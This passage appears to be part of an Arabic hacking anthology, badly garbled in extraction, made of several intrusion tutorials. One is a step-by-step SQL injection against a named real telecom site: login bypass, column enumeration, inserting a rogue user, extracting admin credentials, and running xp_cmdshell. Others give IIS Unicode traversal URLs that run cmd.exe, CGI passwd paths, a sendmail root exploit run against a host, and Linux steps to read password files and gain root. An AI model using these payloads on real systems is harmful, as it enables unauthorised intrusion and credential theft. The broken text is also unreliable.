تحتاجفقطلل User Name و Passwd 

س:‏ منایناحصل علىاسم المستخدم وكلمةالمرور ؟ 

هناك طرق عدیدةلل حصول على User name and Passwd منهاكمااسل ف صفحاتال ASP 

وملفاتاخرى من نو ع ‏*.‏sqlهناكثغراتكثیر یمكن 

انت حصل منها علىكلمات المرور مثلثغرة htr.+ 

كی فتستخدم هذهالثغرة 

: 

htr.+asp.page/target//:http 

target ‏:الموقعالهد ف 

asp صفحة : Page 

htr.+ ‏:الثغرة 

هذه الثغرةتقوماحیانا بفتح صفحةبیضاءلاتحتوي علىاي حر ف ‏....اعر فانك سوف تتساءل مالفائدة 

اذن منهاالفائدة هو 

خل ف هذهالصفحةالبیضاءاذهبالى Viewلكيتر Source ىاوامرالبرمجةالخاصة ب ASP التى 

١٦٠




لایمكنلكانتراهافي الوضع العادي 

: مثل 

%> 

("Connection.ADODB")CreateObject.Server =Set DB 

SQL =DRIVER"Open .DB 

Developer (R)Microsoft ؛PPA‏=‏ =sa;PWD=xxx;UID=Server;SERVER 

"٦٦٦٦٦٦٦" ،"yaRxuniL_" ،"moe_dbs=xxx;DATABASE=Studio;WSID 




لی س منالضرورةانتكونالملفاتبهذهالاسماءلكن هذا هو المعتاد علیه منقبل مبرمجین SQL 

وكل ماعلیك فعلهانتكتباسمالصفحة مثلالاتي 

: 

htr.+asa.global 

هناكثغرةقدیمةفي ٣IIS وهيانتضی ف بعد صفحة ASP هذاالرمز ‏::$‏atadكما یلي 

atad$::asp.file 

هذه الثغرةلاتعملالا على ‎٣IISفلا تتعب نفسك بتطبیقهافقطللعلم لااكثر 

. 

لقداقتربنا من النهایة 

... ماذا بعدال حصول علىاسم المستخدم وكلمة المرور ؟؟ 

بعدهاالدخول علىقاعدةال !! SQL 

هناك عدةبرامجتدخل علىقاعدةالبینا تانااستخدم ‎٦٫٠‎لكني Visual interdev مازلتافضل 

استخدام البرنامجالسهل 

٢٠٠٠ACCESS 

كل ما علی ك فعلههو فتح البرنامح الذهاب الىقائمة 

File 

اختر 

New 

ومنقائمةالملفاتالجدیدةاختار 

. 

(Exiting Data)Project 

اي مشرو عقاعدةبیانات موجودة 

سیظهرلك مربع لانشاء الملفاختر 

Create 

ايانشاء 

الان سترى مربع 

Data Link Properties 

تحتاجفق طلثلا ثمعلوما تاسم الموقعاوالايبي-اسمالمستخدم ‏-كلمة المرور 

Select or enter server name 

١ 

‏-ادخلاسمالموقعفي صندوق 

٢ ‏-اسمالمستخدمفي User Name 

٣ 

‏-كلمة السر Password 

ملاحظة ‏(قم بإزالةالصح من مربع (Blank Password 

اضغطفي البدایة على Testفيالاسفل Connection لاخ تبارالاتصال بقاعدةالبیانا تاذا رأیت هذه 

١٦٢


: 



العبارة Test Connection Succeeded 

فمعناهانالاتصال بقاعدةالبیاناتتمبنجاح.‏ 

یمكنكالانانتختارايقاعدةبیاناتترید الدخولالیها منالقائمةالمسندلة 

Select the data base on the server 

واضغط على OKاو موافق ... 

١٦٣



" درس مفصل عن الSQL " 


$$$$$$$$$$$$$ 

الكاتب:‏ hish_hish 

$$$$$$$$$$$$$ 

أتجهت غالبیةالمواقع لإ ستخدام صفحات دینامیكیه ومنها ما ن حن موجودینفیه :) 

وتستخدمقواعدبیانا تفیهاكمكبیر من المعلوما ت,‏ 

وعن طریق سكربت مكتوببإ حد ىلغات الویبالدینامیكیه PHPأوASP والتيتعمل جمباإلى جمب مع 

محركاتقواعدالبیانات 

. 

SQL Server , MySQL,Oracle 

یتمأستخلا ص المعلوماتالمطلوبهوتركالبقیه 

حی ثتأخذمعلومات منالمستخدم ومنثمتعالج ویستخدم بعضهافيتكونأوامرال SQLلیتمأستخلا ص 

البیانا تأوالتأكد منصحة بع ض المدخلاتلبناءالصفحةالمطلوبهأوقبولالمستخدمأو رفضه دائمایتم 

طلبأسم مستخدم وكلمة مرورفيالصفحاتالتيتخولك بعمل عمل لا یقومبهإلا منقام صاحب الموقع 

بإعطائهالصلاحیهللقیامبهاكأن یقومبحذ ف موضوعي ‏:)أوتثبیتهفي القائمه 

حی ثیتمالتأكد من وجودأسمالمستخدمفيقاعدةالبیاناتوأنكلمةالمرورالمعطاه مطابقه لتلكالموجوده 

بجانبأسم المستخدم حی ثیتمأخذ معلومهوتضمینهافيأمرال SQL الذي یقومبالتأكد من وجودها 

وصلاحیتها ولكن یجب الحذر عند كتابة سكربت یقوم بتوثیق المستخدملل تأكد منأنه مخوللهبالدخول 

للصفحه المحمیهأم لا وذلكبالتأكد من نظافةالقیمالمستقبله منالمستخدم وخلوها منأي رموز من شأنها 

أنتجعلأمر ال SQL خاطئفيبنائهأوالقیام بأيأمر غیر مسموحبه 

((((: 

سنتكلمالآن عن ما یسمى SQL injection 

حیثأنهضع ففي كتابة سكربت التوثیق وأیضابوجود موقعللتجربه 

وهو موقع شركةالإتصالاتالسعودیه 

عنوان الموقع http://www.stc.com.sa/ 

عند الدخولللصفحةالرئیسیه نجد رابط یخت صبمقدمي خدمةأنترنتفيالسعودیه 

وهو 

عنددخولهفأنه یطلب منكأسم مستخدم وكلمة مرور 

دائمافيالحاله هذهأول مایتبادرلنا هو الinjection SQL 

نقوم بتجربة 

http://www.stc.com.sa/arabic/scripts/ar_frame.asp?pagenum=25 

!!!! 

أسم مستخدم : ' 

وكلمة مرور'‏ : 

فن حصل علىالخطأ التالي 

اقتباس : 

Microsoft OLE DB Provider for ODBC Drivers error 

'80040e14' 

١٦٤




[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed 

quotation mark before the character string '' '. 

/arabic/Scripts/ar_csd_reply.asp, line 33 

وفي بع ض الحالا ت یظهرالخطا التالي 



'80040e14' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed 

quotation mark 

before the character string ''' AND Password=''. 

/admin/admin.asp, line 13 

وفي الخطأ هذا حصلنا علىجزء منأمر ال SQL وأیضاأسمأحد الأعمدهفيالجدول 

وهو ما یؤكدأمكانیة عمل injectلل SQL Query المستخدمهللتحقق صلاحیةأسمالمستخدم وكلمة 

المرورالمد خله . 

إذنلنتكلم عنال SQLبشيء injection منالتفصیل 

لوكانلدینا سكربت یقومبالتأكد من صلاحیةاسم المستخدم وكلمةالمرور المد خله من المستخدمقأننا 

سنتحقق منهابالطریقة التالیه 

code: 

SELECT * from Users WHERE User_Name='' AND Password='' 

if( TRUE ){ 

Login OK 

} 

else { 

Login FAILD 

} 

١٦٥




: 

عندقیامأحد المسموحلهمبالدخولللصفحةالمحمیهفأنه یقوم بكلتأكید بتوثیق نفسهقبلأن یسمحله 

بالدخول 

فعندقیامه بأدخالأسمالمستخدم وكلمة المرورالخاصهبه 

أسم المستخدمadmin : 

كلمة المرورt0ps3cr3t : 

فإ ن شكلامر ال SQL سیصبحبالشكل التالي 

code: 

SELECT * from Users WHERE Users_Name='admin' AND 

Password='t0ps3cr3t' 

وعند وجود سطرفي جدول Userتحق قفیهالشرط وهوأن یكوناسمالمستخدم admin وكلمةالمرور 

t0 ps3cr3t 

فأن الأمر سیقومبإرجا عقیمة TRUEأيأن المستخدم مخولبالدخول 

غیر ذلك سیتمإرجاع FALSEوسیتم رف ضالدخول 

. 

ملاحظه ‏:یجبأن یكونلدیك ولوالقلیل من المعرفه بأوامرال.‏ SQL 

form> field‏>یحل from web م حلها ماأد خله المستخدمفي صفحةالتحقق من صلاحیته 

فيتجربتنا عندماقمنابإدخال ‏'كإسم مستخدم وبالمثللكلمةالمرورفأنأمرال SQLأصبحبالشكلالتالي 

code: 

: 

SELECT * from Users WHERE User_Name=' ' ' AND 

Password=' ' ' 

ونلاحظأنناقمنابإغلاق علامة التنصی ص الأولى وبقي علامةتنصی صلمتغلق بعد 

وهو ماأدىلظهور رسالة الخطأ!!‏ 

الأن نقوم بتجربةاٍم مستخدم‎1'='1‎‏'‏ : blah' OR 

ومثلهالكلمة المرور.‏ 

فیصبح شكلأمرالSQL 

code: 

SELECT * from Users WHERE User_Name='blah' OR '1'='1' 

AND Password='blah' OR '1'='1' 

١٦٦




لن حلل الأمركلجزء على حدا 

SELECT * from Users 

تعنيأختر جمیعالسطور منالجدولUsers 

WHERE User_Name='blah' OR '1'='1' AND Password='blah' OR '1'='1' 

في هذاالجزء نقوم بتحدیدالسطر الذي سنقوم بإختیاره وهوالذي تتحق قفیهالشروط 

'blah' OR '1'='1' 

هنابوجود ORلمتصبحقیمة نصیه ولكنأصبحت شرط 

یصبح الشرط ص حیحإ ذاكان طر ف واحد على الأقل من الأطرا فالمشتركهفيالشرط ص حیح 

وفي حالتنافإ نالطر ف الأول هو'‏blah‏'‏ 

وهوبدونالخو ضفيتفاصیللسنافي صددهاالانیعبر عنقیمةص حیحهTRUE 

والطر فالأخر هو '١' ='١' 

یمكنكالإجابة عنإ ذاكانت ١ مساویهل ‎١‎أم لا 

إ ذا سیكون شكل الشرط بعدت حلیله هوTRUE TRUE OR 

وبالتاليفإن النتیجهالنهائیهللشرط هيTRUE 

ونفسالتفاصیلتحد ثلكلمةالمرور 

ملاحظه مهمه جداُ:القیمه TRUE التي ن حصلها منالشرطلیست مساویهللكلمه TRUE التي نكتبها 

علىلوحةالمفاتیحالخاصهبنا 

لذلك لاتحاول إ ستخدامأسم مستخدم TRUE وكلمة مرور TRUEلإتمامالinjection SQL 

!!!! 

الشرط السابق سیقوم بأختیارأول سطر من الجدول Users ویرجع محتویاتهفي مصفوفه 

وبالتاليفي بع ضالحالات ستجدأنكقدأستطعت الدخولللصفحةالمحمیه 

ولكنفي حالاتأخرى لا 

لنكملالتفاصیل.....‏ 

یجب التنبهلأنه ربما یكون الشرطفيأمر ال SQL وهو ما یأتي بعد WHEREیتحقق من عدةأشیاء 

لذلك نستخدم dashes) (two ‏--لیتمإهمال بقیةالسطر حیثیمكننا ا لإ ستعاضه عن ماأدخلاناهقبل 

قلیلبالمدخلاتالتالیه 

، 

أسم مستخدم--'‏‎1'='1‎‏'‏ : blah' OR 

وكذلككلمةالمرور ‏(في بع ضالحالات یمكنكإهمال كتابةكلمة مرورلأن -- ستهملهالأنهاتأتي بعداسم 

المستخدمفيأمرالSQL 

توجد طریقه مریحه جدا ومضمونهب حیثأنكلنتحتاج لتخمینأحدأسماء الأعمده 

وهيأستخدامclause having 

بالطریقهالتالیه 

أسم مستخدم'‏‎1=1‎ --having 

حیث سن حصل على رسالة خطأكالتالیه 

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 

'cs_isp_user.UserID' is invalid in the select list because it is not 

contained in an aggregate function and there is no GROUP BY clause. 

١٦٧




/Arabic/Scripts/ar_csd_reply.asp, line 33 

وبهاأسم الجدول وأیضاأسمأول ع مود 

بعدهالنستطیعال حصول علىاسماء بقیةالأعمده 

سنستخدمby group 

بالشكل التالي 

--group by cs_isp_user.UserID' 

بعدها سن حصل على عمودأسمهpasswd 

فنستخدمهلل حصول علىاسمالعمود اللي یلیهبالشكلالتالي 

--group by cs_isp_user.UserID,cs_isp_user.passwd' 

ونكرر زیادةأسمكل جدول مع العمودإلىأن ن حصل على صفحةتخبرنا بأنأسمالمستخدم خاطئ ! 

نحتاج الأنأن نقومبجمعأكبرقدر ممكن منأسماءالأعمدهفي هذاالجدول 

نقومبإدخالالتالي:‏ 

أسم مستخدم--(‏username‏)‏ : blah' group by 

فن حصل علىالخطأ التالي : 



'80040e14' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Invalid 

column name 'username'. 


وهو ما یفید بأنه لا یوجد عمودفي هذاالجدوللهالأسمusername 

نقوم بتجربه الأسماءالشائعه مثلusername,id,userid,email‏,‏ password 

,first_name 

عندتجربتنال useridفأننا ن حصل على خطأأخر وهو ما نبحث عنه 



'80040e14' 


١٦٨




'cs_isp_user.passwd' is invalid in the select list because it is 

not contained in either an aggregate function or the GROUP 

BY clause. 


هنا حصلنا علىمعلومتین وهيأسمالجدول وهوcs_isp_user 

وأیضاأسمأحدالأعمده وهوpasswd 

نقومالان بتكرارالعملالسابق ولكن بإ ستخداماسم العمود الجدید 

فنقومبإدخالأسم المستخدم التالي--(‏passwd‏)‏ : blah' group by 

فن حصل علىالخطأ التالي : 



'80040e14' 


'cs_isp_user.UserID' is invalid in the select list because it is 

not contained in either an aggregate function or the GROUP 

BY clause. 


حصلنا علىأسم عمود وهو UserID وهو نفسه ماقمنا بتخمینه وهوuserid 

تجدرالإشارهإلىأن MSلیس SQL Server حساسلحالة الأحر ف 

نلاحظأننا سنكونفي حلقه غیر منتهیه ولا ن حصلإلا علىأسماء الجداول UserID وpasswd 

إذنالجدول لا یحويإلا على عمودین وهي التي حصلنا علیها 

إذنفي الحاله هذه نقوم بأدخال مستخدم جدیدللجدول وبعدها نقومبالدخولبشكل طبیعي من الصفحه 

الخاصه بتسجیلالدخول 

سنقوم بكتابة التاليفي خانةأسمالمستخدم 

(: 

blah' INSERT INTO : 

(: 

cs_isp_user(UserID,passwd 

) VALUES('M_3','hi')-- 

حیث سیتمإ ضافة مستخدم جدیدلهأسم مستخدم 3_M وكلمة مرورhi 

وبعدهاتستطیعالدخولللصفحةالمحمیهبهذهالبیانات علىأنك مخوللهبالدخول 

في مثالنا ‏(شركة الإتصالا ت)أنتهینا مناستغلالأمكانیة عمل injectلها ولكننا سنكملالحدیث عن طریقه 

١٦٩




ممتعهلكي نستطبعقرائةاسماءالمستخدمین وكلمات مرورهم وبعدهاتستطیعالدخول بأي منها دون 

إ ضافة نفسك 

وهوالأمرالذيلن یضع شكوك حول وجودلشخ ص مشبوه 

سنكمل مابدأناه ولكنبإ ضافة عمودأخرلهالأسم id وهو رقمتسلسليلكل مستخدم ‏(تذكرأنه رقم ( 

إذنلدینا جدولأسمهuser 

یحويالاعمدهالتالیه 

idوهو رقم ص حیح 

نصیه ‏(القیمالنصیه یمكنأنتحويأرقام)‏ مثالadmin1‎ usernameوهوقیمة 

passwdوهيأیضاقیمه نصیه 

نجرب عمل unionلقیمه نصیه وتحویلهاإلىقیمة عددیه ‏(لنیتم التحویل ولكنه سیخرج رساله خطأ 

ثمینه جدا)‏ 

ندخلاسمالمستخدمuser : blah' union SELECT username FROM 

و سن حصل على رسالة خطأ لاتفیدنافي شيء 

رسالةالخطأهي 



'80040e14' 

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries 

in an SQL statement containing a UNION operator must have 

an equal number of expressions in their target lists. 


نقوم بزیادة id مره واحد فتصبحبالشكل التالي 

blah' union SELECT username,username FROM user 

فن حصل على نفس رسالةالخطأ 

نتابعالزیادهإلىأن ن حصل على رسالة خطأ مختلفه 

لنفتر ضأننا حصلنا على رسالةالخطأ الجدیده عندأدخالاسم المستخدم التالي 

blah' union SELECT username,username,usernam 

e,username,username FROM user 

فن حصل على رسالة الخطأالتالیه 

١٧٠






'80040e07' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax 

error converting the 

varchar value 'Lame_Admin' to a column of data type int. 


(: حصلنا علىأولأسم مستخدم وهو عادةً‏ ما یكونللأدمن 

وسبب ظهور هذا الخطأ هولأننا نطلب من محرك SQLأن یقوم بتحویلقیمة نصیه ‏(وهي 

إلىقیمة عددیه ص حیحه(‏int ( 

وهوالشيءالغیر مسموح ‏،لذلك یقوم بأخباركأنه لا یستطیعتحویل Lame_Adminإلىقیمة عددیه 

ص حیحه :) هذاأذكى شيقامت microsoft بعمله 

الان حصلنا علىأسمالمستخدم وسنحاولال حصول علىكلمة المرور 

ندخلأسمالمستخدمالتاليpasswd,passwd,passwd,pass :blah' union SELECT 

(: 

Lame_Admin) 

wd,passwd FROM user 

بنفس العدد السابق عند حصولنا علىأسمالمستخدم 

سن حصل على هذا الخطأ 



'80040e07' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax 

error converting the 

varchar value 'stupid' to a column of data type int. 


حصلنا علىأسم المستخدم وكلمةالمرور ویمكنناتسجیل الدخولللصفحة المحمیهبدون وجودأي أثرلنا 

إلاإ ذاكانتالصفحهالمحمیه عندالدخوللهاتقومبطباعة بع ضالمعلومات مثل رقمالایبيلأخر شخ ض 

١٧١




قامبالد خولبإسمالمستخدم هذا 

عندهافكربما ستقومبهبنفسك 

بقيأتكلم عن ال Stored Procedure 

وهي كتشبیه أقربإلىأدوات موجوده مسبقا Built-inتقوم بعمل محدد عند طلبها 

ستستطیعا لإ ستفاده منال Storedإ Procedure ذاكانال SQL Server یعمل علىالمستخدم 

sa 

أوإ ذاكا ن المستخدم الذيیعمل علیهال SQLتمالسماحلهباٍ‏ Server ستخدامها 

لذلكفأنت م حظوظ عند حصولك على SQLبهذهالأمكانیات Server 

یوجدأكثر من 

Stored Procedure ١٠٠ 

في الجدولالتاليأهمها 

+ ---------------------------+----------------------------------------------------------------------- 

-------+ 

| xp_cmdshell----------| 

|--- 

| xp_regread-----------| 

|----- 

| xp_regdeletekey----| 

|----- 

| xp_regdeletevalue-| 

|---- 

| xp_regwrite ----------| 

|------ 

| xp_servicecontrol--| 

|---- 

+----------------------------+---------------------------------------------------------------------- 

-------+ 

تمریرأمرلنظامالتشغیل ‏(یتمتنفیذه على حسب صلاحیات المستخدم )---- 

قراءةقیمة مفتاحفي الریجستري---------------------------------------‏ 

حذ ف مفتا ح من الریجستري--------------------------------------------‏ 

حذ فقیمة مفتا ح من الریجستري----------------------------------------‏ 

للكتابةفي الریجستري-------------------------------------------------‏ 

لبدأأوأنهاء خدمة على السیرفر----------------------------------------‏ 

أما 

طریقة ا لإ ستفاده منأي من هذهال Procedureفهيبالشكلالتالي 

'exec master..xp_cmdshell 'dir 

هذا مثاللطریقةأستخدام xp_cmdshell والبقیه مثله 

عداالكتابةفي الریجستريفهوبالشكلالتالي 

'exec master..xp_regwrite 'REGISTERY KEY' VALUE 

١٧٢




أیضا بقيالإشارهإلىأنه بأمكانكقراءةكود ملفا ت asp التيیعمل علیهاالموقع عن طریقإ ضافة جدول 

جدید ومنثم نسخكود صفحة asp ووضعه 

في هذاالجدولبالطریقةالتالیه 

((CREAT TABLE M_3 ( source varchar(8000 

هذا السطر یقوم ببناء الجدول وأسم الجدول 3_M وبداخله عمود واحد من النو ع varchar 

‎٨٠٠٠‎بایت 

حجمه 

بعد ذلك بأمكانكالانإ ضافةأي مل ف علىالسیرفرإلى هذا الجدول ومنثمقرائتهبالشكل التالي 

'bulk insert M_3 from 'c:\InetPub\wwwroot\login 

.asp 

ولقرائة ماتم نسخه یمكنك ذلك عن طریق رسائل الخطأالليتكلمنا عنهافي الموضو عالسابق 

أسهلها هو عمل union حی ثیتمتولید رسالة خطأبها ماتم نسخه....‏ 

١٧٣




" 

درس لإحتراف الهاك في اختراق المواقع 

" 

$$$$$$$$$$ 

الكاتب CONIK: 

$$$$$$$$$$ 

س:-‏ ماهيالثغرا ت ومامعناها ؟؟ 

ج:-الثغرات هىضع فأمنى یساعدكفى دخول نظاممعین وأختراقه وقدتكونأیضاالطریقةالمساعدة 

التىتخلیك تتحول من user الى administrator یعنى من مستخدم الىالمدیرالمتصر فوتتضمن 

ویجب علىالدواممعرفة الثغراتالامنیهالجدیدة وأستثمارها علشان لایتنبهأصحابالمواقعبیها 

یرقعوها ‏(یتمتقفلیها)‏ وأقرب مثاللهذهالثغراتالضع ف الأمنيالذ ىأكتش ففيالاباتشى وهو سیرفر 

یركب على نظاملیونكس وأ ىضع ففىأحد البرامجأوقاعدهبناءالموقعتعتبرثغرة ومنالممكن 

استخدامها والأستفاده منهافيأختراق الموقعالمرادأختراقه والتحكمفي الموقع ومشاهدة الباسوردات 

وكل ماترید عن طریقها 

س‎٢‎ : - طیبكی فانااستثمرالثغرهاذاانالقیتها ؟؟؟ 

ج : - من وقت ماأكتشفوا الثغراتكانت منالثغراتتكون سكربتاتها مكتوبهبالغه C وانته 

تحتاجلمعرفة هذهاللغهأو علیكتحویلها 

نسبة ٩٩% 

. 

كماأن هناك العدید منالثغرات یحتاجالى shell حتىانته تتمكن منالأستفاده من هذه الثغرهأوبمعنى 

أخر الضع ف وعلى سبیل المثال بع ضالثغرات الموجودهفى PHPتحتاج الى Shell PHP ومن هذه 

الكلام.‏ 

وعلىفكرةالضع ف یكونفيالاصدارات الخاصة 

وكمانفيثغره من نو ع Kernel x.2.2 ولكن هذهالمرةفي نظامتشغیللیونكس 

‏(ملاحظه هذهالثغراتالتىتكونباللغة Cتكون سیكربتاتتوجودهفىالموقع ( وهناكأیضا سیكربتات 

أخر ى مكتوبةباللغه perl ولازمفى هذه الحالةتكونانته مركبلوینكس علشانالاوامر وأناأنص حك 

تركب‎7.3‎ linux Redhat 

لأنهأفضل منالماندریك وأذكرانهالأ خبلاك هانترلمنانا سألتهأركبالماندریك ولاالریدهاتقاللىانه 

الماندریك صورة مبسطه 

للریدهاتبس غیرقابلهللتطور وأنه الریدهات أقوى وجزاةاالله خیر على هذهالنصیحة نرجعللموضو ع 

س ‎٣‎‏:-كیفأحوللغهالبیرل ؟؟ 

ج:-الطریقة مره سهلهكلهااوامر عادیةفيالبدایة انته سو ى هذه الأمر 

./file.pl 

تعطیك هذه الرسالة 

Denied---- Accessهذه الرسالةتوضح عدم الموافقه 

أذا صارلككذاك ل ما علیك سو ى كتا بتهالامر هذه 

Conik.pl----- chmodلاحظ x+ مكانكونیكانتهتكتبأسم الملف 

١٧٤




وشغلة مرهثانیة وشو ف النتجیه راحتكون ز ىكذا 

$ ./Conik.pl 

س‎٤‎‏:-‏ طیببالنسبةللغةC؟ 

ج:-‏ علشانتحویل المل ف لازم انتهتخلىالمل ف یكون مل فتنفیذ ىبهذهالامر 

------> Conik.c gccلاحظانهانتهتكتبأسم -o Conik المل فبدالأسمىكونیكالمرادتغیرة 

یعنى على سبیلالمثال :- 

gcc -o Conik conik.c 

وراح یكون المل ف جاهز بعد هذهالامر 

./Conik.c 

وبعد ماصارالمل ف جاهز 

$ gcc -o sendmail sendmail.c 

$ ./sendemail 

Usage : sendmail 

$ ./sendmail smtp.israel.com RedHat-7.3 anonymous anonymous -----> 

لاحظانكانتهتكتب هنا الموقع الىتبغاه مكانisrael 

connecting to host... 

connected... 

id 

uid=0(root) gid=0(root) 

لاحظانه طلب ممناالملقمللبرنامج Sendemail وكمان طلب نظامالتشغیل والیوزر والباسورد 

وبعد هذهكله البرنامجأعطاناأمتیاز Rootبسببقیام البرنامج بتنفیذ الnofer Exan 

ملاحظة لاتضنأنهلمنانا حطیتالبرنامج ‏.‏XXXبدون SENDMAIL ا ى سببأنا حطی تلك هذه 

المثال لآنه هناكثغرهفى هذه البرنامج وراحأشرحهالكأن شاءااللهتعالىبسكانبدىتحفظ الأسم هذه 

الظاهرانه ن حنا أتوغلنافى الموضو ع زایدة عن اللزوم 

س‎٥‎‏:-‏ یاااللهكل هذه علشانثغرهب سبطل تأنا ماأبغا اتعلم؟ 

ج:-لووووول حبیبالبى هذهالطریقةالمعقده شویةللثغراتفيثغراتثانیة حلوة وسهله جدا جدا 

س‎٦‎‏:-أی شهيقو ل یا Conikتر ى هذه الطریقة یبغالها نظامتشغیل وكمانلغه C وPerl؟ 

ج:-فيتغرا تتستخدم من خلالالمتصفحیعنىانتهتشو ف معلومات الموقع عبرالمتصفحوتوصل الى 

مل فالباسوردات من هذهالطریقه 

١٧٥




ومثال على هذه الثغرا تetc PHP - CGI - UNICODE - VB - 

س‎٧‎‏:-اوووووة UNICODEأنا سمعت عنهاكثیر نفسىاشو فكی ف شكلها وأعر ف وی ش هى ؟؟؟ 

ج:-‏ حبیبى UNICODEهى عبارة عنضع ففي نظام IISفي Microsoft مماتساعدفيأختراق 

الموقع بكل سهوله عموماالاختراقبهذهالطرق سه ل جدا 

مقارنةبالطرق السابقة التىتم ذكرها منقبل وسو فأضعأمثله علىثغرا ت-:‏ UONICODE 

/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25% 


/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe 

?/c+dir+c:\ 

/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32 


/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/syste 




r+c:\ 

/cgibin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd 

.exe?/c+dir+c:\ 

حاولتقد المستطا عانىأشكلفىأنوا عUONICODE 

أمابالنسبةالىثغرات ال CGI هذه مثال علیها 

/ cgi-bin/view-source?../../../../../../../etc/passwd 

/cgi-bin/phf 

/cgi-bin/wwwboard.pl 

/cgi-bin/AT-admin.cgi 

١٧٦




/cgi-bin/info2www 

/cgi-bin/environ.cgi 

هذه وباقىالعدید من الثغراتیعنى لا یقتصر الأمر على هذهالثغرات وراح أقسمالثغرا تلكب حسب نظام 

التشغیل 

NT : Uni code , bofferoverfollow , tftp 

Liunx : Get Access , CGI , buffer overfollow , PHP , send mail , 

ProFTPD, WU-FTPD, Kernel Exploits, rootkits, 

UNIX : Get Access , CGI , buffer overfollow , PHP , send mail , Kernel 

...exploits, rootkits, ProFTPD, WU-FTPD, 

١٧٧




‏"استغلال لینكس في اختراق المواقع 

" 

$$$$$$$$$$$$$$ 

الكاتب 2001: Viagra 

$$$$$$$$$$$$$$ 

هذا الموضو ع مخص صلمنأراد التعامل معلینكسفياختراق المواقع ولیسلدیه الخبرة الكافیةفیه ... 

سو ف یكون هذا الموضو ع عن العملیات التيیست حسن القیامبها بعد ال حصول علىكلمة السر والنجاحفي 

الدخول على النظام .. 

أولایجب انتعر ف بأنهیمكن انتدخل على بع ض الانظمةباستخدام بع ض الكلمات المشهورة وتوجد بع ض 

الانظمةتسمحلك بتنفیذأمر واحدثمتقومباخراجك من النظام بعد ذلك وأفضلتلك الأوامرهي .: 

who 

rwho 

finger 

وتستفید من هذه الأوامر بأنكتستعر ضاسماء المستخدمینللنظام وبذلكیمكن انتستخرجكلمة السر من 

نفس الاسم وذلكلأن بع ض المستخدمینیستعملكلمة سر مشابهةتقریبالأسمه 

مثل .: 

username : Black 

password : Black2 

وفي بع ض الأنظمةتستطیع الدخول بكتابة testأو demo 

من الملفات المهمة والتيیجب علیكاستخراجها بعددخولك علىأي 

نظام .: 

/etc/passwd 

/etc/group 

/etc/hosts 

/usr/adm/sulog 

/usr/adm/loginlog 

/usr/adm/errlog 

/usr/adm/culog 

/usr/mail 

/usr/lib/cron/crontabs 

/etc/shadow 

ال حساب .: bin 

وهو مهم حی ثیحتوي على حساب المستخدم ویوجدبه معظم الملفات المهمة وقد یوجد 

واذاكانكذلكفیمكن 

أحیانا ‏(اضافةكلمة سر خاصةبك وتضی ف حسابد خول)‏ روت ‏(لك !! 

مل فكلمة السر 

( 

والطریقةبسهولةكالتالي .: 

ed passwd $ 

وأخیراتقول exec login وتكتبأياسم وبذلكتكون انت مدیر النظام !! 

١٧٨




ما الذي سو فتواجهه عنددخولك علىأي نظام بكلمة سر واسم مستخدم؟ !! 

عنددخولك الى النظام ستقابلاحد ى هذه الاحتمالات .: 

اما انكاست طعت ال حصول على حساب مدیر النظام)‏ الروت ‏(أو انك حصلت على حساب 

في البدایةتكتب الامر التالي .: 

مستخدمآخر .. 

pwd $ 

والنتیجةتظهر .: 

usr/admin/ $ 

النتیجة اظهرت انكاستطعت الدخول على المدیر وبذلكتستطیع التعامل معكامل النظامبدونقیود .. 

اذاظهرتنتیجة رغی تلك النتیجة ‏..فمثلا : 

usr/Black/ $ 

فهذا یدل على انكدخلت على حساب هذا المستخدم !! 

ولعر ض ملفات هذا المستخدمتكتب 

الآتي .: 

ls /usr/Black $ 

وسو ف یعر ضلك ملفات هذا المستخدم .: 

mail 

pers 

games 

bin 

ولكن هذالن یعر ض مل ف .profile 

ولكيتستعرضهتكتب الآ 

تي .: 

cd $ 

ls -a $ 

: 

: 

.profile 

$ 

اذا اردتقراءةمحتویات ملففسو فتكتب الأمر التالي .: 

cat letter $ 

وهذا اذا افترضنا ان المل ف المطلوبهو letter 

اذا اردتتغییركلمة السرفما علیك 

passwd $ 

الا انتكتب .: 

ثم سیطلب منككلمة السر القدیمة وهي طبعا معك ‏!!وتدخلكلمة السر الجدیدة .. 

للب حث عن معلومة معینةتكتب الأمر التالي .: 

grep phone Black $ 

وهذابافترا ض انك طلبت ارقام الهات ف الخاصةبالمستخدم الآخر 

ولعمل نسخ من مل ف الى 

cp letter letters $ 

مل فآخرتكتب الآتي .: 

١٧٩




اذا اردت عمل 

مع محادثة 

مستخدمآخر على اتصال فتكتب الأمر التالي .: 

write $ 

ولمعرفة 

who $ 

من یوجد على النظام نكتب الآتي .: 

safadM tty1 april 19 2:30 

paul tty2 april 19 2:19 

gopher tty3 april 19 2:31 

واذا اردتقراءة الملف المحتوي علىكلمات السر المظللةیجب انتكونقددخلت على النظامباستخدام 

حساب المدیر نفسه .. ولاستعرا ض مل فكلمات السر 

نكتب .: 

cat /etc/passwd $ 

root:F943/sys34:0:1:0000:/: 

sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh 

checkfsys:Locked;:0:0:check file system:/usr/admin:/bin/rsh 

وقدیظهر 

حسابآخرللمدیركالتالي .: 

Black:chips11,43:34:3:Mr doooom:/usr/Black: 

وهذا یعني انهیمكنللمستخدم الاحتفاظ بكلمة السرلمدةثلاثةاسابیعبدونتغییر وانهیجب ان یغیرهاكل 

ستة 

استعرا ض مل ف المجموعةكالتالي .: 

اسابیع .. 

ls /etc/group $ 

root::0:root 

adm::2:adm,root 

bluebox::70: 

ویمكن انیحتوي ملف المجموعة علىكلمات سرأو لایحتوي !! 

اذاكان لایحتوي علىكلمة سرفانهیمكن انتصبح انت مدیراللنظامفي 

عادي ولیسكمدیرللنظام وذلك بعدة طرق 

حالةدخولك بكلمة 

سرلمستخدم 

.… 

١٨٠


شرح مفصل من الألف إلى الیاء في احتراف 

طریق لینكس 

" 

اختراق المواقع عن 

" 

